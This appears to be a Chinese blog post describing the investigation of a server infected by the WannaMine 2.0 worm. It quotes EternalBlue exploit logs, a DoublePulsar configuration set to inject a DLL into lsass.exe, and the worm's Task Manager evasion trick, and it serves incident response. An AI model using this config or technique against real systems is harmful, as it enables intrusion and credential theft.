近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。

打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:\Windows\SpeechsTracing\spoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:

C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt

出于好奇心紧接着打开stage1.txt,看到如下内容:

[*] Connecting to target for exploitation.

    [+] Connection established for exploitation.

[*] Pinging backdoor...

    [+] Backdoor not installed, game on.

[*] Target OS selected valid for OS indicated by SMB reply

[*] CORE raw buffer dump ( bytes):

0x00000000    6e  6f             Windows Server

0x00000010          6e          R2 Enterpris

0x00000020                   e  Service P

0x00000030    6b                                   ack .

[*] Building exploit buffer

[*] Sending all but last fragment of exploit packet

    ................DONE.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Starting non-paged pool grooming

    [+] Sending SMBv2 buffers

        ..........DONE.

    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Sending last fragment of exploit packet!

    DONE.

[*] Receiving response from exploit packet

这不正是一个SMB攻击,再看一下同目录下的stage2.txt:

[+] Selected Protocol SMB

[.] Connecting to target...

[+] Connected to target, pinging backdoor...

    [+] Backdoor returned code:  - Success!

    [+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2

    SMB Connection string is: Windows Server  R2 Enterprise  Service Pack

    Target OS is:  R2 x64

    Target SP is:

    [+] Backdoor installed

    [+] DLL built

    [.] Sending shellcode to inject DLL

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Command completed successfully

<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">

  <inputparameters>

    <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">

      <value>10.244.251.57</value>

    </parameter>

    <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>

    <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">

      <default>stdout</default>

      <value>stdout</value>

    </parameter>

    <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">

      <default>false</default>

      <value>false</value>

    </parameter>

    <paramchoice name="Protocol" description="Protocol for the backdoor to speak">

      <default>SMB</default>

      <value>SMB</value>

      <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>

      <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>

    </paramchoice>

    <paramchoice name="Architecture" description="Architecture of the target OS">

      <default>x64</default>

      <value>x64</value>

      <paramgroup name="x86" description="x86 32-bits"></paramgroup>

      <paramgroup name="x64" description="x64 64-bits"></paramgroup>

    </paramchoice>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <default>OutputInstall</default>

      <value>RunDLL</value>

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">

        <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>

      <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">

        <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">

          <value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>

        </parameter>

        <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

        <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">

          <default>lsass.exe</default>

          <value>lsass.exe</value>

        </parameter>

        <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

      </paramgroup>

      <paramgroup name="RunShellcode" description="Run raw shellcode">

        <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>

    </paramchoice>

  </inputparameters>

  <outputparameters>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">

        <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

    </paramchoice>

  </outputparameters>

</config>

基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。

服务器中了蠕虫病毒Wannamine2.0小记的更多相关文章

  1. Window应急响应(二):蠕虫病毒

    0x00 前言 ​ 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...

  2. 3.Windows应急响应:蠕虫病毒

    0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播, 每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序.常见的蠕虫 ...

  3. 30天轻松学习javaweb_Eclipse在修改了web.xml后将自动更新到tomcat服务器中

    context.xml中增加<WatchedResource>WEB-INF/web.xml</WatchedResource>,Eclipse在修改了web.xml后将自动更 ...

  4. 注册asp.net 4.0版本到IIS服务器中

    在IIS服务器的运维的过程中,有时候部署asp.net网站发现未安装.net framework对应版本信息,此时就需要重新将.net framework对应的版本注册到IIS中,此处以重新注册.ne ...

  5. [转帖]Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染

    Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染 https://www.kubernetes.org.cn/5951.html 本来想说可以用 official版本的镜像 但是一 ...

  6. 关于winlogo.exe中了“落雪”病毒的解决方法

    Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出.该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行,若不是 ...

  7. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  8. Ramnit蠕虫病毒分析和查杀

    Ramnit是一种蠕虫病毒.拥有多种传播方式,不仅可以通过网页进行传播,还可以通过感染计算机内可执行文件进行传播.该病毒在2010年第一次被安全研究者发现,从网络威胁监控中可以看出目前仍然有大量的主机 ...

  9. Trick蠕虫病毒来袭!幕后主使竟是一名高中生“黑客”!

    黑客一直是美国电影中的重要元素,很多经典大片中都有黑客的身影,如战争游戏.黑客帝国等.电影中黑客总是神通广大.行侠仗义,<战争游戏>中的年轻黑客大卫•莱特曼利用黑客技术避免引爆核武器,&l ...

随机推荐

  1. jconsole工具使用

    Jconsole,Java Monitoring and Management Console. Jconsole是JDK自带的监控工具,在JDK/bin目录下可以找到.它用于连接正在运行的本地或者远 ...

  2. 把tree结构数据转换easyui的columns

    很多时候我们的datagrid需要动态的列显示,那么这个时候我们后台一般提供最直观的数据格式tree结构.那么需要我们前端自己根据这个tree结构转换成easyui的datagrid的columns. ...

  3. 原创:vsphere概念深入系列二:vSphere交换机命令行查看排错

    1.如何查看VM的IP Addresses, MAC Addresses, Uplink ports, Port ID,VSS/VDS,portgroup,DVPort Group,vmnic Upl ...

  4. BaseDAO使用

    BaseDao接口的过人之处在于:一般是提供从数据库 增加.删除.修改记录.查询所有记录.查询符合某个条件记录.取得某条记录等方法的底层数据操作自定义类.由于我们可能操作多个数据库表,这样就需要为每个 ...

  5. Memcache及telnent命令具体解释

    1.启动Memcache 经常使用參数 memcached 1.4.3 -p <num>      设置port号(默认不设置为: 11211) -U <num>      U ...

  6. CentOS下网卡启动、配置等ifcfg-eth0教程(转)

    步骤1.配置/etc/sysconfig/network-scripts/ifcfg-eth0 里的文件.it动力的CentOS下的ifcfg-eth0的配置详情: [root@localhost ~ ...

  7. openssl - 怎么打开POD格式的帮助文件

    原文链接: http://zhidao.baidu.com/link?url=47I6A0YGA9FnK6galKZ5sxPSZzFGRdng2qhACb4ToBuhuyMhdrwcYpZmNI28y ...

  8. C#-MVC开发微信应用(8)--菜单管理的实现

    之前讲解了微信后台管理页面的操作来管理菜单,下面我们在简单的来看一下,代码是如何实现的. 我们要实现获取微信的菜单.创建菜单.删除菜单等操作. 01.首先定义菜单操作的接口: /// <summ ...

  9. 使用vw做移动端页面的适配

    Flexible到今天也有几年的历史了,解救了很多同学针对于H5页面布局的适配问题.而这套方案也相对而言是一个较为成熟的方案.简单的回忆一下,当初为了能让页面更好的适配各种不同的终端,通过Hack手段 ...

  10. 【Unity】EasyTouch5触屏检测

    Unity AssetStore地址    https://assetstore.unity.com/packages/tools/input-management/easy-touch-5-touc ...